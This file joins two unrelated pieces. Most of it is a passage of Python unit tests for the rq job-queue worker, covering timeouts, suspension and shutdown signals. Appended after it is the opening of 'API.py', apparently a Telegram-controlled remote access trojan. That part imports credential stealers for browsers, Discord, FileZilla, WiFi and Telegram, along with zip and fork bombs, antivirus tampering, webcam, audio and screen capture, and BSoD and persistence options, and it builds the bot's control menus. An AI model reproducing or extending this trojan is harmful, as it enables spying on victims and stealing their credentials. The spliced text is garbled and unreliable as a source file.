# second_handler is not run since it's interrupted by black_hole
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertEqual(job.meta.get('second_handler'), None)
def test_cancelled_jobs_arent_executed(self):
    """Cancelling jobs."""
    SENTINEL_FILE = '/tmp/rq-tests.txt'  # noqa
    try:
        # Remove the sentinel if it is leftover from a previous test run
        os.remove(SENTINEL_FILE)
    except OSError as e:
        # errno 2 (ENOENT) means the sentinel was not there, which is
        # fine; any other OSError is unexpected and must surface.
        if e.errno != 2:
            raise
    q = Queue()
    job = q.enqueue(create_file, SENTINEL_FILE)
    # Here, we cancel the job, so the sentinel file may not be created
    self.testconn.delete(job.key)
    w = Worker([q])
    w.work(burst=True)
    assert q.count == 0
    # Should not have created evidence of execution
    self.assertEqual(os.path.exists(SENTINEL_FILE), False)
@slow  # noqa
def test_timeouts(self):
    """Worker kills jobs after timeout."""
    sentinel_file = '/tmp/.rq_sentinel'
    q = Queue()
    w = Worker([q])
    # Put it on the queue with a timeout value
    res = q.enqueue(create_file_after_timeout,
                    args=(sentinel_file, 4),
                    job_timeout=1)
    try:
        os.unlink(sentinel_file)
    except OSError as e:
        # Only a missing file (errno 2, ENOENT) is expected here.
        # The previous `if e.errno == 2: pass` silently swallowed
        # every OSError (e.g. permission errors); re-raise anything
        # unexpected, matching the sibling tests.
        if e.errno != 2:
            raise
    self.assertEqual(os.path.exists(sentinel_file), False)
    w.work(burst=True)
    self.assertEqual(os.path.exists(sentinel_file), False)
    # TODO: Having to do the manual refresh() here is really ugly!
    res.refresh()
    self.assertIn('JobTimeoutException', as_text(res.exc_info))
def test_worker_sets_result_ttl(self):
"""Ensure that Worker properly sets result_ttl for individual jobs."""
q = Queue()
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w = Worker([q])
self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertNotEqual(self.testconn.ttl(job.key), 0)
self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
# Job with -1 result_ttl don't expire
job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1)
w = Worker([q])
self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.ttl(job.key), -1)
self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
# Job with result_ttl = 0 gets deleted immediately
job = q.enqueue(say_hello, args=('Frank',), result_ttl=0)
w = Worker([q])
self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.get(job.key), None)
self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
def test_worker_sets_job_status(self):
"""Ensure that worker correctly sets job status."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello)
self.assertEqual(job.get_status(), JobStatus.QUEUED)
self.assertEqual(job.is_queued, True)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, False)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, True)
self.assertEqual(job.is_failed, False)
# Failed jobs should set status to "failed"
job = q.enqueue(div_by_zero, args=(1,))
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FAILED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, True)
def test_job_dependency(self):
"""Enqueue dependent jobs only if their parents don't fail"""
q = Queue()
w = Worker([q])
parent_job = q.enqueue(say_hello, result_ttl=0)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
parent_job = q.enqueue(div_by_zero)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertNotEqual(job.get_status(), JobStatus.FINISHED)
def test_get_current_job(self):
"""Ensure worker.get_current_job() works properly"""
q = Queue()
worker = Worker([q])
job = q.enqueue_call(say_hello)
self.assertEqual(self.testconn.hget(worker.key, 'current_job'), None)
worker.set_current_job_id(job.id)
self.assertEqual(
worker.get_current_job_id(),
as_text(self.testconn.hget(worker.key, 'current_job'))
)
self.assertEqual(worker.get_current_job(), job)
def test_custom_job_class(self):
"""Ensure Worker accepts custom job class."""
q = Queue()
worker = Worker([q], job_class=CustomJob)
self.assertEqual(worker.job_class, CustomJob)
def test_custom_queue_class(self):
"""Ensure Worker accepts custom queue class."""
q = CustomQueue()
worker = Worker([q], queue_class=CustomQueue)
self.assertEqual(worker.queue_class, CustomQueue)
def test_custom_queue_class_is_not_global(self):
"""Ensure Worker custom queue class is not global."""
q = CustomQueue()
worker_custom = Worker([q], queue_class=CustomQueue)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.queue_class, CustomQueue)
self.assertEqual(worker_generic.queue_class, Queue)
self.assertEqual(Worker.queue_class, Queue)
def test_custom_job_class_is_not_global(self):
"""Ensure Worker custom job class is not global."""
q = Queue()
worker_custom = Worker([q], job_class=CustomJob)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.job_class, CustomJob)
self.assertEqual(worker_generic.job_class, Job)
self.assertEqual(Worker.job_class, Job)
def test_work_via_simpleworker(self):
"""Worker processes work, with forking disabled,
then returns."""
fooq, barq = Queue('foo'), Queue('bar')
w = SimpleWorker([fooq, barq])
self.assertEqual(w.work(burst=True), False,
'Did not expect any work on the queue.')
job = fooq.enqueue(say_pid)
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, os.getpid(),
'PID mismatch, fork() is not supposed to happen here')
def test_simpleworker_heartbeat_ttl(self):
"""SimpleWorker's key must last longer than job.timeout when working"""
queue = Queue('foo')
worker = SimpleWorker([queue])
job_timeout = 300
job = queue.enqueue(save_key_ttl, worker.key, job_timeout=job_timeout)
worker.work(burst=True)
job.refresh()
self.assertGreater(job.meta['ttl'], job_timeout)
def test_prepare_job_execution(self):
"""Prepare job execution does the necessary bookkeeping."""
queue = Queue(connection=self.testconn)
job = queue.enqueue(say_hello)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Updates worker statuses
self.assertEqual(worker.get_state(), 'busy')
self.assertEqual(worker.get_current_job_id(), job.id)
# job status is also updated
self.assertEqual(job._status, JobStatus.STARTED)
self.assertEqual(job.worker_name, worker.name)
def test_prepare_job_execution_inf_timeout(self):
"""Prepare job execution handles infinite job timeout"""
queue = Queue(connection=self.testconn)
job = queue.enqueue(long_running_job,
args=(1,),
job_timeout=-1)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Score in queue is +inf
self.assertEqual(self.testconn.zscore(registry.key, job.id), float('Inf'))
def test_work_unicode_friendly(self):
"""Worker processes work with unicode description, then quits."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Adam',
description='你好 世界!')
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, 'Hi there, Adam!')
self.assertEqual(job.description, '你好 世界!')
def test_work_log_unicode_friendly(self):
"""Worker process work with unicode or str other than pure ascii content,
logging work properly"""
q = Queue("foo")
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
job = q.enqueue('tests.fixtures.say_hello_unicode', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_suspend_worker_execution(self):
"""Test Pause Worker Execution"""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
q.enqueue(create_file, SENTINEL_FILE)
w = Worker([q])
suspend(self.testconn)
w.work(burst=True)
assert q.count == 1
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
resume(self.testconn)
w.work(burst=True)
assert q.count == 0
self.assertEqual(os.path.exists(SENTINEL_FILE), True)
@slow
def test_suspend_with_duration(self):
q = Queue()
for _ in range(5):
q.enqueue(do_nothing)
w = Worker([q])
# This suspends workers for working for 2 second
suspend(self.testconn, 2)
# So when this burst of work happens the queue should remain at 5
w.work(burst=True)
assert q.count == 5
sleep(3)
# The suspension should be expired now, and a burst of work should now clear the queue
w.work(burst=True)
assert q.count == 0
def test_worker_hash_(self):
    """Workers are hashed by their .name attribute"""
    queue = Queue('foo')
    # Three workers but only two distinct names: the set collapses
    # the duplicate "worker1" entry.
    workers = {
        Worker([queue], name="worker1"),
        Worker([queue], name="worker2"),
        Worker([queue], name="worker1"),
    }
    self.assertEqual(len(workers), 2)
def test_worker_sets_birth(self):
    """Ensure worker correctly sets worker birth date."""
    q = Queue()
    w = Worker([q])
    w.register_birth()
    birth_date = w.birth_date
    self.assertIsNotNone(birth_date)
    # assertIsInstance is consistent with test_worker_sets_death and
    # gives a clearer failure message than comparing the type's name
    # as a string.
    self.assertIsInstance(birth_date, datetime)
def test_worker_sets_death(self):
"""Ensure worker correctly sets worker death date."""
q = Queue()
w = Worker([q])
w.register_death()
death_date = w.death_date
self.assertIsNotNone(death_date)
self.assertIsInstance(death_date, datetime)
def test_clean_queue_registries(self):
"""worker.clean_registries sets last_cleaned_at and cleans registries."""
foo_queue = Queue('foo', connection=self.testconn)
foo_registry = StartedJobRegistry('foo', connection=self.testconn)
self.testconn.zadd(foo_registry.key, {'foo': 1})
self.assertEqual(self.testconn.zcard(foo_registry.key), 1)
bar_queue = Queue('bar', connection=self.testconn)
bar_registry = StartedJobRegistry('bar', connection=self.testconn)
self.testconn.zadd(bar_registry.key, {'bar': 1})
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
worker = Worker([foo_queue, bar_queue])
self.assertEqual(worker.last_cleaned_at, None)
worker.clean_registries()
self.assertNotEqual(worker.last_cleaned_at, None)
self.assertEqual(self.testconn.zcard(foo_registry.key), 0)
self.assertEqual(self.testconn.zcard(bar_registry.key), 0)
# worker.clean_registries() only runs once every 15 minutes
# If we add another key, calling clean_registries() should do nothing
self.testconn.zadd(bar_registry.key, {'bar': 1})
worker.clean_registries()
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
def test_should_run_maintenance_tasks(self):
"""Workers should run maintenance tasks on startup and every hour."""
queue = Queue(connection=self.testconn)
worker = Worker(queue)
self.assertTrue(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow()
self.assertFalse(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow() - timedelta(seconds=3700)
self.assertTrue(worker.should_run_maintenance_tasks)
def test_worker_calls_clean_registries(self):
"""Worker calls clean_registries when run."""
queue = Queue(connection=self.testconn)
registry = StartedJobRegistry(connection=self.testconn)
self.testconn.zadd(registry.key, {'foo': 1})
worker = Worker(queue, connection=self.testconn)
worker.work(burst=True)
self.assertEqual(self.testconn.zcard(registry.key), 0)
def test_job_dependency_race_condition(self):
"""Dependencies added while the job gets finished shouldn't get lost."""
# This patches the enqueue_dependents to enqueue a new dependency AFTER
# the original code was executed.
orig_enqueue_dependents = Queue.enqueue_dependents
def new_enqueue_dependents(self, job, *args, **kwargs):
orig_enqueue_dependents(self, job, *args, **kwargs)
if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id:
Queue._add_enqueue = None
Queue().enqueue_call(say_hello, depends_on=job)
Queue.enqueue_dependents = new_enqueue_dependents
q = Queue()
w = Worker([q])
with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked:
parent_job = q.enqueue(say_hello, result_ttl=0)
Queue._add_enqueue = parent_job
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
# The created spy checks two issues:
# * before the fix of #739, 2 of the 3 jobs where executed due
# to the race condition
# * during the development another issue was fixed:
# due to a missing pipeline usage in Queue.enqueue_job, the job
# which was enqueued before the "rollback" was executed twice.
# So before that fix the call count was 4 instead of 3
self.assertEqual(mocked.call_count, 3)
def test_self_modification_persistence(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack."""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
def test_self_modification_persistence_with_error(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack -- even if the job errored"""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self_and_error, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_true(self, mock_logger_info):
"""Check that log_result_lifespan True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
mock_logger_info.assert_called_with('Result is kept for %s seconds', 10)
self.assertIn('Result is kept for %s seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_false(self, mock_logger_info):
"""Check that log_result_lifespan False causes job lifespan to not be logged."""
q = Queue()
class TestWorker(Worker):
log_result_lifespan = False
w = TestWorker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
self.assertNotIn('Result is kept for 10 seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_true(self, mock_logger_info):
"""Check that log_job_description True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertIn("Frank", mock_logger_info.call_args[0][2])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_false(self, mock_logger_info):
"""Check that log_job_description False causes job lifespan to not be logged."""
q = Queue()
w = Worker([q], log_job_description=False)
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertNotIn("Frank", mock_logger_info.call_args[0][2])
def test_worker_version(self):
q = Queue()
w = Worker([q])
w.version = '0.0.0'
w.register_birth()
self.assertEqual(w.version, '0.0.0')
w.refresh()
self.assertEqual(w.version, '0.0.0')
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.version, '0.0.0')
def test_python_version(self):
python_version = sys.version
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(w.python_version, python_version)
# now patching version
python_version = 'X.Y.Z.final' # dummy version
self.assertNotEqual(python_version, sys.version) # otherwise tests are pointless
w2 = Worker([q])
w2.python_version = python_version
w2.register_birth()
self.assertEqual(w2.python_version, python_version)
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w2.key)
self.assertEqual(worker.python_version, python_version)
def wait_and_kill_work_horse(pid, time_to_wait=0.0):
    """Sleep for ``time_to_wait`` seconds, then SIGKILL the process with ``pid``.

    Helper used by the shutdown tests to simulate a work horse dying
    unexpectedly while the worker is monitoring it.
    """
    time.sleep(time_to_wait)
    os.kill(pid, signal.SIGKILL)
class TimeoutTestCase:
    """Mixin that arms a SIGALRM watchdog so a hung test fails instead of blocking."""

    def setUp(self):
        # If a worker ignores its shutdown signal it would keep running and
        # block the test run forever, so schedule an alarm that aborts the
        # test after a fixed number of seconds.
        self.killtimeout = 15
        signal.signal(signal.SIGALRM, self._timeout)
        signal.alarm(self.killtimeout)

    def _timeout(self, signum, frame):
        # SIGALRM handler: turn a hang into a test failure.
        raise AssertionError(
            "test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout
        )
class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
    """Exercise warm/cold worker shutdown and detection of a dead work horse."""

    @slow
    def test_idle_worker_warm_shutdown(self):
        """worker with no ongoing job receiving single SIGTERM signal and shutting down"""
        w = Worker('foo')
        self.assertFalse(w._stop_requested)
        # kill_worker (defined elsewhere in this module) runs in a child
        # process and signals this test process while the worker blocks in
        # work(); False presumably selects a single (warm) signal — confirm
        # against its definition.
        p = Process(target=kill_worker, args=(os.getpid(), False))
        p.start()
        w.work()
        p.join(1)
        # An idle worker shuts down without ever raising the stop flag.
        self.assertFalse(w._stop_requested)

    @slow
    def test_working_worker_warm_shutdown(self):
        """worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down"""
        fooq = Queue('foo')
        w = Worker(fooq)
        # The job creates this file after 2 seconds; its existence below
        # proves the job was allowed to run to completion.
        sentinel_file = '/tmp/.rq_sentinel_warm'
        fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
        self.assertFalse(w._stop_requested)
        p = Process(target=kill_worker, args=(os.getpid(), False))
        p.start()
        w.work()
        p.join(2)
        self.assertFalse(p.is_alive())
        self.assertTrue(w._stop_requested)
        self.assertTrue(os.path.exists(sentinel_file))
        # A warm shutdown records when the request arrived.
        self.assertIsNotNone(w.shutdown_requested_date)
        self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime')

    @slow
    def test_working_worker_cold_shutdown(self):
        """Busy worker shuts down immediately on double SIGTERM signal"""
        fooq = Queue('foo')
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_cold'
        fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
        self.assertFalse(w._stop_requested)
        # True presumably makes kill_worker signal twice, forcing a cold
        # shutdown — confirm against its definition.
        p = Process(target=kill_worker, args=(os.getpid(), True))
        p.start()
        # A cold shutdown exits the worker via SystemExit.
        self.assertRaises(SystemExit, w.work)
        p.join(1)
        self.assertTrue(w._stop_requested)
        # The job was killed before it could create its sentinel file.
        self.assertFalse(os.path.exists(sentinel_file))
        shutdown_requested_date = w.shutdown_requested_date
        self.assertIsNotNone(shutdown_requested_date)
        self.assertEqual(type(shutdown_requested_date).__name__, 'datetime')

    @slow
    def test_work_horse_death_sets_job_failed(self):
        """worker with an ongoing job whose work horse dies unexpectedly (before
        completing the job) should set the job's status to FAILED
        """
        fooq = Queue('foo')
        self.assertEqual(fooq.count, 0)
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
        if os.path.exists(sentinel_file):
            os.remove(sentinel_file)
        fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
        job, queue = w.dequeue_job_and_maintain_ttl(5)
        w.fork_work_horse(job, queue)
        # SIGKILL the forked work horse shortly after it starts, while the
        # parent is still monitoring it.
        p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5))
        p.start()
        w.monitor_work_horse(job, queue)
        job_status = job.get_status()
        p.join(1)
        # The dead horse must leave the job marked FAILED and registered.
        self.assertEqual(job_status, JobStatus.FAILED)
        failed_job_registry = FailedJobRegistry(queue=fooq)
        self.assertTrue(job in failed_job_registry)
        self.assertEqual(fooq.count, 0)

    @slow
    def test_work_horse_force_death(self):
        """Simulate a frozen worker that doesn't observe the timeout properly.
        Fake it by artificially setting the timeout of the parent process to
        something much smaller after the process is already forked.
        """
        fooq = Queue('foo')
        self.assertEqual(fooq.count, 0)
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
        if os.path.exists(sentinel_file):
            os.remove(sentinel_file)
        # launch_process_within_worker_and_store_pid (defined elsewhere)
        # presumably writes its child's pid into sentinel_file — it is read
        # back as an int below; confirm against its definition.
        fooq.enqueue(launch_process_within_worker_and_store_pid, sentinel_file, 100)
        job, queue = w.dequeue_job_and_maintain_ttl(5)
        w.fork_work_horse(job, queue)
        # Shrink the timeout only after forking, so the monitor sees the
        # horse as having overrun almost immediately.
        job.timeout = 5
        w.job_monitoring_interval = 1
        now = utcnow()
        time.sleep(1)
        with open(sentinel_file) as f:
            subprocess_pid = int(f.read().strip())
        self.assertTrue(psutil.pid_exists(subprocess_pid))
        w.monitor_work_horse(job, queue)
        fudge_factor = 1
        total_time = w.job_monitoring_interval + 65 + fudge_factor
        # Monitoring must give up well before the job's original 100s runtime.
        self.assertTrue((utcnow() - now).total_seconds() < total_time)
        self.assertEqual(job.get_status(), JobStatus.FAILED)
        failed_job_registry = FailedJobRegistry(queue=fooq)
        self.assertTrue(job in failed_job_registry)
        self.assertEqual(fooq.count, 0)
        # The grandchild process must have been cleaned up as well.
        self.assertFalse(psutil.pid_exists(subprocess_pid))
def schedule_access_self():
    """Enqueue an ``access_self`` job on the default queue.

    Intended to run inside a worker, so it uses the worker's current
    Redis connection.
    """
    queue = Queue('default', connection=get_current_connection())
    queue.enqueue(access_self)
@pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X')
class TestWorkerSubprocess(RQTestCase):
    """Run the ``rqworker`` CLI as a real subprocess against the test Redis DB."""

    def setUp(self):
        super(TestWorkerSubprocess, self).setUp()
        # Point the CLI at the same Redis database the test fixture uses.
        db_num = self.testconn.connection_pool.connection_kwargs['db']
        self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num

    def test_run_empty_queue(self):
        """Run the worker in its own process with an empty queue"""
        # '-b' presumably runs in burst mode so the process exits once the
        # queue is drained — confirm against the rqworker CLI.
        subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])

    def test_run_access_self(self):
        """Schedule a job, then run the worker as subprocess"""
        q = Queue()
        job = q.enqueue(access_self)
        subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
        # The job must have finished and the queue must be empty afterwards.
        registry = FinishedJobRegistry(queue=q)
        self.assertTrue(job in registry)
        assert q.count == 0

    @skipIf('pypy' in sys.version.lower(), 'often times out with pypy')
    def test_run_scheduled_access_self(self):
        """Schedule a job that schedules a job, then run the worker as subprocess"""
        q = Queue()
        job = q.enqueue(schedule_access_self)
        subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
        registry = FinishedJobRegistry(queue=q)
        self.assertTrue(job in registry)
        assert q.count == 0
@pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals')
@skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy')
class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
    """SIGUSR1-driven shutdown behaviour of the Heroku worker variant."""

    def setUp(self):
        super(HerokuWorkerShutdownTestCase, self).setUp()
        # Scratch directory where the dummy worker drops its
        # 'started'/'finished' marker files (checked by the tests below).
        self.sandbox = '/tmp/rq_shutdown/'
        os.makedirs(self.sandbox)

    def tearDown(self):
        shutil.rmtree(self.sandbox, ignore_errors=True)

    @slow
    def test_immediate_shutdown(self):
        """Heroku work horse shutdown with immediate (0 second) kill"""
        # run_dummy_heroku_worker is defined elsewhere in this module; the
        # second argument is presumably the kill delay in seconds — confirm.
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGUSR1)
        p.join(2)
        self.assertEqual(p.exitcode, 1)
        # The job started but was killed before it could finish.
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))

    @slow
    def test_1_sec_shutdown(self):
        """Heroku work horse shutdown with 1 second kill"""
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGUSR1)
        time.sleep(0.1)
        # Right after the signal the worker is still alive (exitcode None)...
        self.assertEqual(p.exitcode, None)
        p.join(2)
        # ...but it exits within the join window.
        self.assertEqual(p.exitcode, 1)
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))

    @slow
    def test_shutdown_double_sigrtmin(self):
        """Heroku work horse shutdown with long delay but SIGUSR1 sent twice"""
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGUSR1)
        # We have to wait a short while, otherwise the second signal won't be processed.
        time.sleep(0.1)
        os.kill(p.pid, signal.SIGUSR1)
        p.join(2)
        self.assertEqual(p.exitcode, 1)
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))

    @mock.patch('rq.worker.logger.info')
    def test_handle_shutdown_request(self, mock_logger_info):
        """Mutate HerokuWorker so _horse_pid refers to an artificial process
        and test handle_warm_shutdown_request"""
        w = HerokuWorker('foo')
        path = os.path.join(self.sandbox, 'shouldnt_exist')
        # Stand-in for a work horse: a process that would create `path`
        # after 2 seconds if left alive.
        p = Process(target=create_file_after_timeout_and_setsid, args=(path, 2))
        p.start()
        self.assertEqual(p.exitcode, None)
        time.sleep(0.1)
        w._horse_pid = p.pid
        w.handle_warm_shutdown_request()
        p.join(2)
        # would expect p.exitcode to be -34
        self.assertEqual(p.exitcode, -34)
        # The stand-in was killed before it could create the file.
        self.assertFalse(os.path.exists(path))
        mock_logger_info.assert_called_with('Killed horse pid %s', p.pid)

    def test_handle_shutdown_request_no_horse(self):
        """Mutate HerokuWorker so _horse_pid refers to non existent process
        and test handle_warm_shutdown_request"""
        w = HerokuWorker('foo')
        # Must not raise even though no process with this pid exists.
        w._horse_pid = 19999
        w.handle_warm_shutdown_request()
class TestExceptionHandlerMessageEncoding(RQTestCase):
    """Regression tests for non-ASCII text inside exception messages."""

    def setUp(self):
        super(TestExceptionHandlerMessageEncoding, self).setUp()
        self.worker = Worker("foo")
        # Clear the handler chain so handle_exception runs without side effects.
        self.worker._exc_handlers = []
        # Mimic how exception info is actually passed forwards: raise a real
        # exception (with a non-ASCII message) and capture sys.exc_info().
        try:
            raise Exception(u"💪")
        except Exception:
            self.exc_info = sys.exc_info()

    def test_handle_exception_handles_non_ascii_in_exception_message(self):
        """worker.handle_exception doesn't crash on non-ascii in exception message."""
        self.worker.handle_exception(Mock(), *self.exc_info)
|
API.py | from RAT import *
from Core.Settings.Organization import *
from Core.Settings.Antivirus import *
from Core.Settings.Admin import *
from Core.Settings.CriticalProcess import *
from Core.Settings.MessageBox import *
from Core.Network.Information import *
from Core.Network.Location import *
from Core.Main.Screen import *
from Core.Main.Webcam import *
from Core.Main.Audio import *
from Core.Main.Power import *
from Core.Main.Autorun import *
from Core.Files.Tasklist import *
from Core.Files.Taskkill import *
from Core.Fun.Message import *
from Core.Fun.Speak import *
from Core.Fun.OpenURL import *
from Core.Fun.Wallpapers import *
from Core.Bomb.ZipBomb import *
from Core.Bomb.ForkBomb import *
from Core.Stealer.Wifi import *
from Core.Stealer.FileZilla import *
from Core.Stealer.Discord import *
from Core.Stealer.Chromium import *
from Core.Stealer.Telegram import *
from Core.Other.Clipboard import *
#from Core.Other.Keylogger import *
from Core.Other.SendKeys import *
from Core.Other.Monitor import *
from Core.Other.Volume import *
from Core.Other.Rotate import *
from Core.Other.Freeze import *
from Core.Other.DVD import *
import telebot
bot = telebot.TeleBot(TelegramToken, threaded=True)
bot.worker_pool = telebot.util.ThreadPool(num_threads=50)
menu = telebot.types.ReplyKeyboardMarkup()
button1 = telebot.types.KeyboardButton('/1\n<<')
button2 = telebot.types.KeyboardButton('/2\n>>')
button3 = telebot.types.KeyboardButton('/Screen\n🖼')
button4 = telebot.types.KeyboardButton('/Webcam\n📸')
button5 = telebot.types.KeyboardButton('/Audio\n🎙')
button6 = telebot.types.KeyboardButton('/Power\n🔴')
button7 = telebot.types.KeyboardButton('/Autorun\n🔵')
menu.row(button1, button3, button2)
menu.row(button4, button5)
menu.row(button6, button7)
main2 = telebot.types.InlineKeyboardMarkup()
button1 = telebot.types.InlineKeyboardButton('Hibernate - 🛑', callback_data='hibernate')
button2 = telebot.types.InlineKeyboardButton('Shutdown - ⛔️', callback_data='shutdown')
button3 = telebot.types.InlineKeyboardButton('Restart - ⭕️', callback_data='restart')
button4 = telebot.types.InlineKeyboardButton('Logoff - 💢', callback_data='logoff')
button5 = telebot.types.InlineKeyboardButton('BSoD - 🌀', callback_data='bsod')
button6 = telebot.types.InlineKeyboardButton('« Back', callback_data='cancel')
main2.row(button1)
main2.row(button2)
main2.row(button3)
main2.row(button4)
main2.row(button5)
main2.row(button6)
main3 = telebot.types.InlineKeyboardMarkup()
button1 = telebot.types.InlineKeyboardButton('Add to Startup - 📥', callback_data='startup')
button2 = telebot.types.InlineKeyboardButton('Uninstall - ♻️', callback_data='confirm')
button3 = telebot.types.InlineKeyboardButton('« Back', callback_data='cancel')
main3.row(button1)
main3.row(button2)
main3.row(button3)
main4 = telebot.types.InlineKeyboardMarkup()
button1 = telebot.types.InlineKeyboardButton('Yes, im sure!', callback_data='uninstall')
